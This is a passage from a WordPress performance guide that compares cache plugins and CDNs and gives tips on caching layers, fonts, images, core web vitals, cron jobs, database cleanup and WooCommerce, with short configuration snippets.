SiteGround CDN – not a lot of PoPs/features and you have to use their DNS to use it (which if you remember, was blocked by Google for 4 days). I personally wouldn’t trust this with my site.

6. Cache Plugins

Let’s summarize 5 popular cache plugins in 10 lines or less.

FlyingPress – optimizes for core web vitals and real-world browsing better than the last 3. When a new core web vital update comes out (like fetchpriority resource hints), Gijo is almost always first to add it. Awesome features not found in most cache plugins: preloading critical images lets you set the number of images usually shown above the fold to exclude them from lazy load while preloading them. FlyingPress can also lazy render HTML elements, self-host YouTube placeholders, and it has a lazy-bg helper class for lazy loading background images. FlyingCDN uses BunnyCDN with Bunny Optimizer + geo-replication (great choice). The remove unused CSS feature is faster than WP Rocket’s since it loads used CSS in a separate file (instead of inline) which Perfmatters agrees is faster for visitors. Really, the main thing it doesn’t have is server-level caching. I moved from WP Rocket to FlyingPress and saw a big difference in speed.

Feature | SG Optimizer | WP Rocket | FlyingPress
Server-side caching | ✓ | x | x
Delay JavaScript | x | ✓ | ✓
Remove unused CSS | x | Inline | Separate file
Critical CSS | x | ✓ | ✓
Preload critical images | x | x | By number
Exclude above the fold images | By class | By URL | By number
Lazy load background images | x | Inline | Helper class
Fetchpriority resource hint | x | x | ✓
Lazy render HTML elements | x | x | ✓
Add missing image dimensions | x | ✓ | ✓
YouTube iframe preview image | x | ✓ | ✓
Self-host YouTube placeholder | x | x | ✓
Host fonts locally | x | x | ✓
Font-display: swap | ✓ | x | ✓
Preload links | x | ✓ | ✓
CDN (beyond Cloudflare) | SiteGround CDN | StackPath | BunnyCDN
CDN PoPs | 14 | 60 | 93
CDN Tbps | N/A | 65 | 80
Dynamic caching | ✓ | x | x
CDN geo-replication | x | x | ✓
CDN image optimization | ✓ | x | ✓
CDN image resizing for mobile | x | x | ✓
Documented APO compatibility | x | x | ✓

LiteSpeed Cache – also does a great job optimizing for web vitals and real users, but different than FlyingPress. Mainly because it should only be used on LiteSpeed, it’s free, and it has faster server-side caching. However, the settings can be complicated. While some settings are similar to FlyingPress like loading used CSS in a separate file and lazy loading HTML elements, it has its own unique features such as localizing third-party resources, ESI, guest mode, LQIP, and HTML caching through QUIC. Use LSC if you’re on a LiteSpeed host. Anything else, I’d use FlyingPress.

WP Rocket – removing unused CSS is slower for visitors and RocketCDN isn’t a good CDN. WP Rocket doesn’t self-host fonts (or even recommend it) or video placeholders. Excluding above the fold images from lazy load and preloading them individually is tedious. Still no image optimization or documented APO compatibility. While Gijo releases many new features and updates FlyingPress to address core web vital updates, it seems WP Rocket has fallen behind. Two good things about WP Rocket are automatic delaying of JavaScript and documentation.

SiteGround Optimizer – great for caching, not for web vitals. It lacks way too many features and has a history of compatibility issues which, if you check support threads, the developers blame on third-party plugins/themes. My advice is to only use it for caching, disable everything else, then use FlyingPress or WP Rocket (just make sure page caching is only enabled in 1 plugin and disabled in the other). Of course, SiteGround will glorify their cache plugin even when it's clearly inferior.

NitroPack – don’t use this! The only reason you get better “scores” is because it moves elements off the main-thread so they can’t be detected in speed testing tools. This leads to great (but false) scores and it doesn’t actually do a good job making your website load faster compared to other plugins. Google “NitroPack blackhat” and you’ll find plenty of articles on it.

7. Other Caching

Cache plugins are just 1 layer.

Check whether your host supports object cache (Redis/memcached), OPcache, and HTTP accelerators like Varnish/FastCGI. Most do but they need to be enabled or set up manually.

You also have CDN caching which is its own layer. All of these are meant for different things and you should ideally use most (if not all) of them. People get scared they're using too much caching, but as long as you're only using one tool per layer (not both Redis + memcached, for example), it's a good thing.

  • OPcache – enable in your host (can help reduce CPU usage).
  • Browser cache – enable in your cache plugin (stores files in browsers).
  • HTTP accelerators – enable in your host (probably Varnish or FastCGI).
  • Object cache – Redis generally uses memory more efficiently than memcached and is good for large/eCommerce sites. Once it's enabled in your host, you'll connect it to your site using a plugin (e.g., LiteSpeed Cache, W3 Total Cache, SG Optimizer, WP Redis). Check your host's documentation/support on which plugin is best. For example, Rocket.net requires you to install the WP Redis plugin while Cloudways requires you to install the Redis addon (see the sketch after this list for typical connection constants).
  • CDN cache – APO is not the same as a cache everything page rule or the Super Page Cache plugin. QUIC also does HTML caching, then there are services that include Cloudflare’s full page cache like Rocket.net’s Cloudflare Enterprise, FlyingProxy, and SiteGround Optimizer. The key thing is that you’re caching HTML somewhere as it can significantly improve TTFB.
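Here's a minimal wp-config.php sketch for connecting the Redis Object Cache plugin (the host/port values are assumptions – most hosts set these for you, so check their documentation first):

// wp-config.php – tell the Redis Object Cache plugin where Redis runs
define( 'WP_REDIS_HOST', '127.0.0.1' );
define( 'WP_REDIS_PORT', 6379 );
// Optional: key prefix so multiple sites can share one Redis instance
define( 'WP_CACHE_KEY_SALT', 'example.com:' );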
Take advantage of different caching layers your host offers

8. Plugins

Watch out for plugins that:

  • Add CSS/JS to the frontend – use the Chrome Dev Tools coverage report to see which plugins add CSS and JS. This includes plugins that inject third-party JavaScript or fonts.
  • Increase CPU usage – common with plugins that collect “statistics” like Wordfence’s live traffic report, Query Monitor, and Broken Link Checker. But can really be from any plugin. WP Hive tells you if a plugin increases memory usage when browsing the WP plugin repo.
  • Add database bloat – use WP-Optimize to see which plugins (or specific plugin modules) add the most database overhead. This is explained more in this guide’s database section.
  • Load above the fold – slow plugins are bad enough, but loading them above the fold is even worse. When plugins load below the fold, you can delay them (i.e. comment plugins).
  • Use jQuery – Perfmatters has a script manager setting to show dependencies. Once it’s enabled, head to the script manager → jQuery and it shows you all plugins using jQuery. Felix Arntz wrote an article on how removing jQuery can reduce JavaScript by up to 80%.
Perfmatters shows plugins that depend on jQuery

Lightweight Alternatives

  • Social Sharing – Grow Social.
  • Tables – Gutenberg block (no plugin).
  • Gallery – Gutenberg block (no plugin).
  • Buttons – Gutenberg block (no plugin).
  • Comments – native comments (no plugin).
  • Image Optimization – image CDN (no plugin).
  • Translate – MultilingualPress, Polylang (not WPML).
  • Security – no security plugin (Cloudflare, firewall, etc).
  • Sliders – Soliloquy or MetaSlider (but ideally no sliders).
  • Analytics – call me crazy but I only use Google Search Console.
  • SEO – Rank Math or SEOPress (but most SEO plugins use jQuery).
  • CSS – need custom styling or even a table of contents? Just use CSS.
  • Backups – hosting backups or a lightweight alternative like UpdraftPlus.

In Query Monitor, the “queries by component” section shows your slow plugins. You can also use my list of 75+ common slow plugins. Finally, delete all plugins you’re not using (as well as their database tables in WP-Optimize), and disable plugin features/modules you’re not using.

Plugin | Category | Impact flags (memory / PageSpeed)
All In One SEO | SEO | x x
Broken Link Checker | SEO | x
Disqus | Comments | x
Divi Builder | Page Builder | x x
Elementor | Page Builder | x x
Elementor Premium Addons | Page Builder | x
Elementor Pro | Page Builder | x x
Elementor Ultimate Addons | Page Builder | x
JetElements | Page Builder | x x
Jetpack | Security | x x
NextGEN Gallery | Gallery | x x
Popup Builder | Popup | x x
Site Kit by Google | Analytics | x
Slider Revolution | Slider | x x
Social Media Share Buttons | Social Sharing | x
WooCommerce | WooCommerce | x x
Wordfence | Security | x
wpDiscuz | Comments | x x
WPML | Translate | x x
Yoast SEO | SEO | x

9. CSS + JavaScript

Probably the #1 reason for poor core web vitals.

New Optimizations

  • Remove unused CSS – WP Rocket's method of loading used CSS inline is slower for visitors but better for scores. You should ideally use FlyingPress, LiteSpeed Cache, or Perfmatters for this, which load used CSS in a separate file so it can be cached and doesn't increase HTML size. You should only be using 1 plugin for this. If you're not using an optimization plugin that does this, try DeBloat or PurifyCSS.
  • Remove Gutenberg CSS – if you don't use Gutenberg's block library (i.e. you're using the classic editor), you can remove Gutenberg's CSS which is loaded by default (see the snippet after this list).
  • Asset unloading plugins – remove CSS/JS (or entire plugins) from specific pages/posts where they don’t need to load. Common examples are only loading contact forms on the contact page, only loading social sharing plugins on posts, and disabling WooCommerce plugins where they’re not used. You can also disable specific files like jQuery and elementor-dialog if you don’t use them. I recommend Perfmatters especially if you’re using WP Rocket or SiteGround Optimizer because it has many optimizations not found in these plugins. Be sure to use test mode and dependencies in your script manager settings. For a free plugin, try Asset CleanUp.
  • Critical CSS – loads above the fold CSS immediately which improves LCP. Most cache plugins do this while others (like SG Optimizer) don’t. If you make changes to stylesheets or custom CSS, regenerate critical CSS so it’s current with your site.
  • Load CSS/JS non render-blocking – both deferring JavaScript and critical CSS help serve resources non render-blocking. Make sure they work in your cache plugin and exclude files from defer if they break your site. Or try Async JavaScript.
  • Minify – Cloudflare lets you do this but you should use your cache plugin instead.
  • Don’t combine – should almost always be off especially on big sites or on HTTP/2.
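Here's a minimal sketch of removing the block library CSS mentioned above (add it to a child theme's functions.php or a code snippets plugin, and only if nothing on your front end uses block styles):

// Dequeue Gutenberg/block CSS on the front end if you don't use block styles
add_action( 'wp_enqueue_scripts', function () {
	wp_dequeue_style( 'wp-block-library' );       // core block styles
	wp_dequeue_style( 'wp-block-library-theme' ); // theme styles for blocks
	wp_dequeue_style( 'global-styles' );          // theme.json global styles (WP 5.9+)
}, 100 );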

Optimizations Covered In Other Sections

  • Page builders – Elementor/Divi add extra CSS/JS which can be optimized with their built-in performance settings, coding your header/footer/sidebar in CSS, disabling Elementor fonts/dialog, lazy loading background images in CSS, etc.
  • Plugins – just look at the screenshot below (plugins are obviously a major factor).
  • Third-party code – hosting files locally, delaying JavaScript, and using a smaller GA tracking code can reduce its size or delay so it doesn’t impact initial load times.
  • Font Icons – disable these if you don’t use them or use Elementor’s custom icons.
  • WooCommerce – disable scripts/styles on non-eCommerce content and disable Woo plugins where they don’t need to load (many load across the entire website).
Use the coverage report to find your largest CSS/JS files

10. Third-Party Code

This is anything on your site that has to pull info from a third-party domain (like Google Fonts, Google Analytics tracking code, or an embedded YouTube video). It’s a common reason for JS-related errors in PSI. Luckily, most of it can be optimized especially if it’s shown below the fold.

  • Step 1: Host files locally – some third-party code can be hosted locally (see the table below). LiteSpeed Cache can localize resources, FlyingPress can host fonts/YouTube thumbnails locally, Perfmatters does fonts and analytics, and WP Rocket does nothing.
Third-Party Code | URL(s) | Plugins To Host It Locally
Google Fonts | fonts.gstatic.com | Most optimization plugins, Elementor, OMGF
Google Analytics | google-analytics.com | Flying Analytics, Perfmatters
Gravatars | gravatar.com | Simple Local Avatar
YouTube Thumbnails | i.ytimg.com | FlyingPress, WP YouTube Lyte
  • Step 2: Delay JavaScript – for third-party code that can't be hosted locally, delay its JavaScript if it's loading below the fold (you can also delay plugins loading below the fold). WP Rocket does this automatically while other cache plugins make you add files manually. If your cache plugin doesn't support this, use Perfmatters or Flying Scripts. In these, you'll set a timeout period and can increase this if you're not seeing good results. You can try offloading third-party code to Cloudflare Zaraz, but I prefer delaying its JS. Here are common scripts/keywords people add to their delay list:
ga( '
ga('
google-analytics.com/analytics.js
analytics.js
gtagv4.js
analytics-minimal.js
/gtm.js
/gtag/js
gtag(
/gtm-
adsbygoogle.js
grecaptcha.execute
optimize.js
fbevents.js
fbq(
/busting/facebook-tracking/
disqus.com/embed.js
script.hotjar.com
wp-content/themes/script-name
wp-content/plugins/plugin-name
  • Step 3: Prefetch or preconnect everything else – for all third-party code that can’t be hosted locally or delayed, add a DNS prefetch resource hint. Preconnect is usually only used for CDN URLs (not needed for Cloudflare), and third-party fonts (should be hosted locally). Or YouTube if you can’t eliminate requests using video optimizations in step #13.
  • Google Analytics – Perfmatters + Flying Analytics can use a minimal analytics tracking code that’s just 1.5 KB. Perfmatters can also prevent a Doubleclick request by disabling display features, but both these should only be used if you don’t need certain data in GA.
  • Avoid overtracking – one of the most common “mistakes” I see is sites using too many tracking tools: Analytics, Tag Manager, Heatmaps, Pixel, etc. Do you really need them all?

11. Fonts

Probably your largest files after CSS/JS.

Your GTmetrix Waterfall chart shows font load times, number of requests, and whether they’re served locally or from a third-party domain like fonts.gstatic.com or use.fontawesome.com. Be sure to keep tabs on your Waterfall chart as you make optimizations. Fonts can also cause FOIT and FOUT which cause layout shifts. A few simple tweaks can make your fonts load much faster.

  • Reduce font families, weights, icons – try to only use 1 font family and only load the weights you actually use. Disable Font Awesome and Eicons if you don’t use them (Elementor has a tutorial on this). Some fonts also have larger file sizes than others.
  • Use WOFF2 – the most lightweight/universal format which is faster than .ttf and .otf.
  • Host locally – if your fonts are being served from fonts.gstatic.com, host them locally.
  • Preload – fonts should be preloaded when they load above the fold or used in CSS files. Most cache/optimization plugins require you to manually add font files (and if there’s a crossorigin option like in Perfmatters, it should be used for fonts). Elementor hosts fonts locally and preloads them under Theme Customizer → Performance. PSI used to tell you which fonts to preload in “preload key requests” but I don’t think they do this anymore.
  • Add font-display: optional – if you need to "ensure text remains visible during webfont load," add font-display: optional to your font's CSS. This is recommended by Google for the fastest performance while preventing layout shifts. It delays rendering text for up to 100ms. As of writing this, most plugins only support swap (found in Elementor, Perfmatters, and most cache plugins). To use optional, you need to add it manually to your font's CSS (see the sketch after this list), use WP Foft Loader, or use swap until your optimization plugin supports optional. Preloading fonts that use font-display: optional completely eliminates layout shifts (FOIT) from fonts.
  • Load fonts inline – Elementor and Divi have options to do this and so does FlyingPress.
  • System fonts – system fonts generate 0 requests and are obviously best for speed, but even for someone who obsesses over performance, I’d rather have a better looking font.
  • Use custom Icons for Elementor – replace Font Awesome and Eicons with custom icons.
  • Serve Google Fonts from Cloudflare Workers – I’ll leave this here if you want to dive in.
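A minimal @font-face sketch using font-display: optional (the font name and file path are placeholders – match them to the fonts you actually host locally):

/* Locally hosted font with font-display: optional */
@font-face {
  font-family: 'ExampleSans';
  src: url('/wp-content/uploads/fonts/example-sans.woff2') format('woff2');
  font-weight: 400;
  font-style: normal;
  font-display: optional; /* brief invisible period, then fall back to a system font instead of swapping */
}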

12. Images

There are 7 PSI items related to image optimization, and that doesn’t even cover everything.

  • Preload critical images and exclude them from lazy load – above the fold content should load immediately which is a big factor of LCP. Instead of delaying images with lazy load, you want the browser to download them immediately by using preload. The easiest way to do this (by far) is “preload critical images” in FlyingPress or Perfmatters. Instead of manually excluding/preloading above the fold images on every single page/post (because they’re usually different), you will set the number of images usually shown above the fold. In my case, it’s 3. This will preload your top 3 images while excluding them from lazy load. Currently, FlyingPress is the only cache plugin I know that supports fetchpriority which is recommended by Google to set things like your LCP image to “high priority.” Props to Gijo.
Exclude above the fold images from lazy load and preload them
  • LCP image – your most important image to optimize for lower LCP (shown in PSI).
  • Background images – page builders serve background images in their CSS and won’t be lazy loaded, leading to ‘defer offscreen images’ errors. Some cache plugins have a lazy-bg helper class, Perfmatters has a CSS background images setting, and WP Rocket makes you move them to inline HTML. Check the documentation in your cache/image optimization plugin on how to lazy load them. You can also use Optimal or add a helper class yourself.
  • Image CDNs – I use Cloudflare for image optimization but Bunny Optimizer and QUIC are good too. They usually do a better job than plugins (and it’s 1 less plugin on your website).
  • Resize images for mobile – make sure your image optimization plugin (or image CDN) serves smaller images to mobile which should also improve your LCP on mobile. This is the “image resizing” feature in Cloudflare, or you could use ShortPixel Adaptive Images.
  • Properly size images – resize large images to be smaller. My blog is 765px width so I crop/resize blog images to that size (the Zoom Chrome Extension is handy for getting the perfect dimensions when taking screenshots). I always recommend creating an “image dimensions cheat sheet” so you know the size of your blog, featured, sidebar images, etc.
  • WebP – faster than JPEG/PNG and most image optimization plugins or CDNs can do this.
  • Compression – Lighthouse tests images at 85% so that's usually a good compression level.
  • CSS sprites – combines multiple small/decorative images into 1 image so it only creates 1 request. My old homepage used a CSS sprite and it was very fast. You can do it for sections like “featured on” where you show a bunch of logos. You would use a CSS sprite generator.
  • Specify dimensions – most cache plugins can "add missing dimensions," otherwise you would need to add a width/height to the image's HTML or CSS (see the example after this list). This prevents layout shifts.
  • Downgrade quality on slow connections – services like Cloudflare Mirage + Optimole serve low quality images on slow connections until a faster connection can be accessed.
  • Hotlink protection – stops people from using your images when they’re hosted on your server and saves bandwidth. Common with sites using high quality images or if people copy your content. Can be enabled in your host or by using Cloudflare’s hotlink protection.
  • Low quality images placeholders (LQIP) – if you’re using QUIC.cloud on LiteSpeed, these can prevent layout shifts but you need to make sure you’re doing it right or it will look bad.
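As a simple example of specifying dimensions in HTML (the file name and sizes are placeholders – the browser reserves the space before the image downloads, which prevents layout shifts):

<img src="/wp-content/uploads/example-765x400.webp" width="765" height="400" alt="Example screenshot">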

13. Videos

Unless videos are optimized, they will probably be the slowest thing on a page.

While most cache plugins lazy load videos and replace iframes with a preview image, FlyingPress and WP YouTube Lyte are some of the only plugins that optimize placeholders.

  • Lazy load videos – done in cache plugins, Perfmatters, or try WP YouTube Lyte.
  • Replace YouTube iframes with preview images – the iframe (which is the heaviest element of the video) is only loaded once your visitors actually click the play button.
  • Self-host YouTube placeholders – FlyingPress and WP YouTube Lyte can self-host placeholders to prevent i.ytimg.com requests shown in your “third-party code” report.
  • Preconnect – if you're not able to make the optimizations above and you still have third-party domains loading from YouTube, you can preconnect youtube.com, i.ytimg.com, and the domain serving Roboto (currently the font used in the YouTube player).
https://youtube.com/watch?v=FssULNGSZIA

14. Comments

Third-party comment plugins, Gravatars, or just lots of comments can slow down WordPress.

  • Use native comments (not plugins).
  • Cache Gravatars if using LiteSpeed Cache.
  • Delay third-party comments plugins and Gravatars.
  • Use a local avatar plugin to prevent Gravatar requests.
  • If you must use Disqus, use the conditional load plugin.
  • Break comments in your WordPress discussion settings.
  • Try using a “load more comments” button especially on mobile.
  • Lazy load comments/footer (can be done in FlyingPress or LSC).
  • wpDiscuz has options for lazy loading comments and initiating AJAX loading after the page loads.
Some optimization plugins can lazy load any HTML element (including comments)

15. LCP

Largest contentful paint is the core web vital people struggle with most.

View your "longest main-thread tasks" report in PageSpeed Insights and optimize those files. LCP includes 4 sub-parts and Google's YouTube video is a nice resource for optimizing each one.

LCP breakdown
LCP Sub-Part | Factors | LCP %
TTFB | Primarily hosting and CDNs + full page caching | ~40%
Resource load delay | Exclude above the fold content from optimizations, resource hints | <10%
Resource load time | Reduce image/CSS/JS sizes, critical CSS, CDN, cache expiration | ~40%
Element render delay | Render-blocking CSS/JS, JS file size, font-display optional | <10%

Most LCP recommendations are scattered in this guide, so I’ll just go over them briefly.

  • Exclude above the fold images from lazy load – you should never lazy load, delay, or defer anything that loads above the fold because this content should load immediately, which is why you should also use preload hints to help browsers download them faster.
  • Prioritize above the fold images – preload above the fold images (or use fetchpriority). PSI shows your largest contentful paint image which is the most important to optimize.
  • Reduce CSS, JS, font sizes – a big part of reducing load time is reducing their file sizes.
  • Reduce TTFB – 40% of LCP can usually be improved with a better hosting + CDN setup.
  • Eliminate render-blocking CSS/JS – render-blocking resources add delay (see video).
  • Use font-display: optional – if fonts aren’t loaded properly, they can also add delay.
  • Lazy render HTML elements – allows browsers to focus on the above the fold content.
  • Preload, preconnect, prefetch – hints browsers to download specific resources faster.
  • Increase cache expiration – also mentioned by Google (Cloudflare browser cache TTL).
  • Choose the right cache plugin/settings – some have better optimizations than others.
  • Enable Signed Exchanges (SXGs) – this is found in Cloudflare (Speed → Optimization).
  • Use Cloudflare Workers – a Google engineer used Workers to improve LCP by about 80%.
  • Move plugin content, ads, animations below the fold – that way, they can be delayed.

16. CLS

Layout shifts happen when things jump around while the page is loading.

You can use Google’s layout shift debugger to see these in a GIF. PSI also has an “avoid large layout shifts” item showing you which sections on your website contribute the most to CLS. Even with these recommendations, it’s hard to know why the section is causing a layout shift.

  • Change font-display to swap or optional – do this if you see “ensure text remains visible during webfont load.” As shown in section #11, font-display: optional is the best method.
  • Problems with loading CSS asynchronously – this is a setting in cache plugins that can add layout shifts caused by FOUC (flash of unstyled content). Ideally use the “remove unused CSS” method instead. If this breaks your site and you default back to loading CSS asynchronously, make sure you exclude problematic files causing FOUC, ensure critical CSS is working, and always regenerate critical CSS after updating stylesheets/custom CSS.
  • Preload fonts – preloading fonts eliminates layout shifts when they use display: optional.
  • Specify dimensions of images, videos, iframes, ads – the first 3 are easy (make sure a width and height are specified on images). Ads and other dynamic content should have space reserved by placing them in a div (see the sketch after this list). The width/height should be the ad's largest size.
  • Use CSS transform in animations – not a fan of animations but here’s documentation.
  • Use separate mobile cache (when it makes sense) – if your mobile site is different than desktop and you’re not using a separate mobile cache, it can cause layout shifts. However, you’ll need to check your cache plugin’s documentation on when to use (and not use) this.
  • Change cookie notice plugin – search your plugin’s support thread. It’s been reported some cookie plugins cause layout shifts. I recommend Gijo’s solution or this Cookie plugin.
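A rough sketch of reserving space for an ad slot (the 300×250 size is just an example – use your ad's largest size):

<!-- Reserve the slot's space up front so the page doesn't shift when the ad loads -->
<div class="ad-slot" style="min-width: 300px; min-height: 250px;">
  <!-- ad code goes here -->
</div>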

17. Preload, Prefetch, Preconnect

These help browsers download high priority resources faster.

They prioritize above the fold content (preload + fetchpriority). Preload is also used in Cloudflare’s Early Hints and for downloading internal pages in the background so they load faster when visitors click them (link preloading + Flying Pages). Prefetch + preconnect help establish early connections to third-party domains if resources aren’t already being delayed.

Preload – commonly used for above the fold images (this can also be a WebP image) but can also be used for CSS/JS (i.e. the block library), videos, audio, Cloudflare workers, and other files.

<link rel="preload" href="/image.webp?x55484" as="image">
<link rel="preload" href="/font.woff2" as="font" crossorigin>

Fetchpriority – similar to preload, only it assigns a priority (low, high, auto). For example, if you have a large LCP image, you would assign that image's priority to "high." But if you have an image carousel loading above the fold, you could assign those images a low priority. FlyingPress is the only plugin I know currently supporting fetchpriority, as shown in its changelog.

<img src="lcp-image.webp" fetchpriority="high">

Link preloading – there are 2 main types: preloading links in the viewport so internal links in the immediate content load faster when clicked (supported by Flying Pages and FlyingPress), and hover preloading where users hover over any internal link (or touch it on mobile) and the page downloads in the background so by the time they actually click it, it appears to load instantly (found in cache plugins like WP Rocket). While neither improves scores, both improve perceived load time. Just be careful… preloading too many pages in the background will increase CPU usage, especially if you have something like a WooCommerce store with internal links in images. If visitors are hovering over product images, this will cause lots of pages to download. Not good!


DNS Prefetch – this helps browsers anticipate third-party domains by performing a DNS lookup, but usually not needed since third-party domains should be hosted locally or delayed.

<link rel="dns-prefetch" href="https://connect.facebook.net">
<link rel="dns-prefetch" href="https://www.googletagservices.com">

Preconnect – establishes early connections to important third-party domains. Common with CDN URLs and third-party fonts like fonts.gstatic.com, use.fontawesome.com, and use.typekit. Most cache plugins add preconnect automatically when you add a CDN URL or when enabling “Google Font Optimization” (or a similar setting), but you’ll want to check their documentation.

<link rel="preconnect" href="/assets/vendor/gstatic" crossorigin>
<link rel="preconnect" href="https://cdn.yourdomain.com" crossorigin>
You can use Perfmatters or Pre* Party if your optimization plugin doesn’t support a specific resource hint

18. Database

There are usually 3 problems with using your cache plugin to clean your database:

  • It can’t take database backups.
  • It can’t remove database tables left behind by old plugins.
  • It deletes all post revisions, but you may want to keep a few.

That's why I recommend WP-Optimize for database cleanups. Go through your database tables and look for tables left behind by plugins/themes that are no longer installed or are inactive. You can delete these if you don't plan on using the plugin (or theme) again, since plugins usually keep their data in the database for future use.


Certain plugin modules/features can also add lots of overhead especially if they collect data. Rank Math’s Google Analytics module adds lots of overhead, so consider disabling this Rank Math module and getting your analytics data directly from the Google Analytics website instead.


For ongoing database cleanups, WP-Optimize removes everything most cache plugins do, but it lets you keep a certain number of post revisions so you have backups (I recommend 5-10). You can also connect UpdraftPlus, which takes a database backup before scheduled optimizations.


19. Background Tasks

Background tasks can bog down your server and increase CPU usage.

These are common with cache plugins (preloading + automatic cache clearing), plugins that collect stats or create autoloads, and even WordPress core (Heartbeat, autosaves, pingbacks). Many of these can be disabled, limited, or scheduled during non-peak hours using a cron job.

  • Control preloading – the preloading in cache plugins is infamous for increasing CPU usage (WP Rocket's preloading, LSC crawler, SG Optimizer's preheat cache, etc). The first step is changing settings to only preload important sitemap URLs (e.g., page-sitemap.xml + post-sitemap.xml) instead of the full sitemap. Next, you can increase the preload interval.
Only preload important sitemap URLs (not the full sitemap)
  • Automatic cache clearing – there are specific actions that trigger your entire cache to be cleared (and when the cache lifespan expires). Instead of constantly clearing cache with these actions, disable automatic cache clearing and use a cron job to clear it at a specific time (once at night). It’s best to use a cron job for both cache clearing + cache preloading.
  • Disable WP-Cron – using an external cron to schedule tasks like the 2 items above helps reduce CPU usage. The first step is to add the code below to your wp-config.php file. Next, set up a real cron job in your host, Cloudflare, or using a third-party service like EasyCron. Some hosts have specific instructions for adding a cron job, so check their documentation.
define('DISABLE_WP_CRON', true);

Now add a real cron job.

wget -q -O - https://yourwebsite.com/wp-cron.php?doing_wp_cron >/dev/null 2>&1
Scheduling tasks with cron jobs every 5-10 minutes can reduce CPU usage
  • Remove unused CSS – decrease WP Rocket’s batch size and increase the cron interval.
  • Link preloading – some cache plugins can “preload links” which sounds like a good idea because when users hover over a link, that page downloads in the background to make it load faster by the time users actually click it. But if your website has lots of links (such as a WooCommerce store with links in the product images), you’ll want to leave this setting off.
  • Plugins – think of Query Monitor, Wordfence's live traffic report, and backup/statistics plugins (they all run background tasks). You might be able to schedule these, disable specific features in plugins, or delete the plugin completely. Plugins/themes can also leave behind autoloaded data when you delete them, which can be cleaned up in the wp_options table.
  • Autosaves – when you’re editing a post, WordPress autosaves a draft every minute. You can use a simple line of code (or Perfmatters) to increase this to something like 5 minutes.
define('AUTOSAVE_INTERVAL', 300); // seconds
  • Heartbeat – called every 15s and can usually be disabled in the frontend/backend, then limited in the post editor since you probably want to keep features there (like autosaves).
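If you'd rather limit Heartbeat than fully disable it, here's a minimal sketch using WordPress's heartbeat_settings filter (60 seconds is just an example interval):

// Slow the Heartbeat API down to once per minute
add_filter( 'heartbeat_settings', function ( $settings ) {
	$settings['interval'] = 60; // seconds
	return $settings;
} );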
  • Pingbacks – disable pingbacks since you don’t want a notification every time you add an internal link. You may want to leave trackbacks on to help notify blogs you linked to them.
  • Post revisions – stored every time you hit save, publish, or update, and they accumulate over time. You can limit revisions in some optimization plugins, manually with code, or use WP-Optimize to run scheduled database cleanups while keeping a certain number of revisions.
define( 'WP_POST_REVISIONS', 10 );
  • Plugin data sharing – disable in plugins to save a little resources, sorry plugin developers!
  • Bots – blocking spam bots and using Cloudflare’s crawler hints saves resources from bots.
  • Comment spam – I use Antispam Bee and blacklist these words in the Discussion settings.
  • Hosting features – WP Johnny has nice tips on disabling unused services in your hosting account like the DNS, email, FTP/SFTP, proxies, or other services if you’re not using them.
  • Bloat removal plugins – using plugins like Unbloater + Disable WooCommerce Bloat help.

20. Mobile

Poor mobile scores in PSI are a common issue. Most desktop optimizations transfer over to mobile, so start with the general optimizations first. Otherwise, here are mobile-specific tips.

  • Resize images for mobile – image CDNs and adaptive image plugins do this.
  • Reduce latency – use a faster DNS, faster TLS versions, and Cloudflare’s 0-RTT.
  • Replace sliders/galleries with static images – use responsive editing to do this.
  • Remove unused CSS/JS – Perfmatters can disable unused CSS/JS by device type.
  • Don’t use AMP – lots of challenges and most WordPress users agree not to use it.
  • Fix mobile layout shifts – Google’s layout shift debugger tests mobile layout shifts.
  • Use mobile caching – enable this in your cache plugin or use one that supports this.
  • Know when to use separate mobile cache – check your cache plugin documentation.
  • Downgrade image quality on slow connections – try Cloudflare Mirage or Optimole.
  • Check your responsiveness – even if you use a responsive theme, check this manually.
  • Add a “load more comments” button on mobile – helps if you have lots of comments.
Most image CDNs serve smaller images to mobile (but not RocketCDN)
Disable specific files/plugins from loading on mobile in Perfmatters

21. WooCommerce

WooCommerce sites often have more plugins, scripts, styles, and are more resource-hungry than static sites. You will need to optimize your website even more if you want good results.

  • Hosting – wphostingbenchmarks.com ran tests for multiple WooCommerce hosts, although I think there are much better options than the ones tested (I would personally lean towards something like Rocket.net, GridPane, RunCloud). Obviously very important.
  • Remove WooCommerce admin bloat – Disable WooCommerce Bloat is good for this.
  • Cloudflare Argo + Tiered Cache  – specifically good for speeding up dynamic requests.
  • Redis – also specifically good for WooCommerce (especially Redis Object Cache Pro).
  • Go easy on WooCommerce Extensions – just like other plugins, be minimal with these.
  • Unload WooCommerce plugins – Woo plugins are infamously bad with loading across your entire site. Use your asset unloading plugin to disable them where they’re not used.
  • Product image size – Appearance → Customize → WooCommerce → Product Images.
  • Increase memory limit – WooCommerce sites usually require increasing it even more (see the wp-config.php example after this list).
  • Browser cache TTL – Google recommends 1 year but 1 month is good for dynamic sites.
  • Elasticsearch – speeds up searches especially for websites with thousands of products.
  • Delete expired transients – these can build up quickly so delete them more frequently.
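A minimal wp-config.php sketch for raising the memory limit (256M/512M are just example values – some hosts cap or override these):

// wp-config.php – raise the PHP memory available to WordPress
define( 'WP_MEMORY_LIMIT', '256M' );     // front end
define( 'WP_MAX_MEMORY_LIMIT', '512M' ); // wp-admin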

22. Security

With the right optimizations (and a firewall), you shouldn’t need a security plugin.


A few other tips:

  • Hide your WordPress version.
  • Use a host that takes security seriously.
  • Add security headers (try the HTTP Headers plugin).
  • Use Cloudflare firewall rules (i.e. only access wp-login from your IP).
  • Disable file editing to prevent hackers from editing theme/plugin files (see the snippet after this list).
  • Follow security-related social media accounts like Cloudflare/Wordfence.
  • Check for known vulnerabilities before updating things (especially plugins).
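A minimal sketch covering two of the items above – hiding the WordPress version (functions.php or a snippets plugin) and disabling the file editor (wp-config.php):

// functions.php – stop printing the WordPress version in the page head
remove_action( 'wp_head', 'wp_generator' );

// wp-config.php – disable the built-in theme/plugin file editor
define( 'DISALLOW_FILE_EDIT', true );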

23. PHP Version

Only 7% of websites use PHP 8.

Come on y’all, you already know higher PHP versions are faster and more secure. Google “update PHP version [your host]” and you’ll find instructions. If updating breaks your site, just revert back to your older version (or remove incompatible plugins that aren’t maintained well).

PHP version used by WordPress sites (source: WordPress stats)

24. Make Sure Optimizations Are Working

You set things up, but are they working? Make sure they are.

  • Caching – cache plugins should have documentation to check if the caching is working.
  • Redis/memcached – LiteSpeed Cache’s connection test and most Redis plugins tell you.
Confirm Redis is working (screenshot is in LiteSpeed Cache)
  • CDN Analytics – how many requests are you blocking from bots, hotlink protection, and WAF? What is your cache hit ratio (hopefully around 90%)? CDN analytics are very useful.
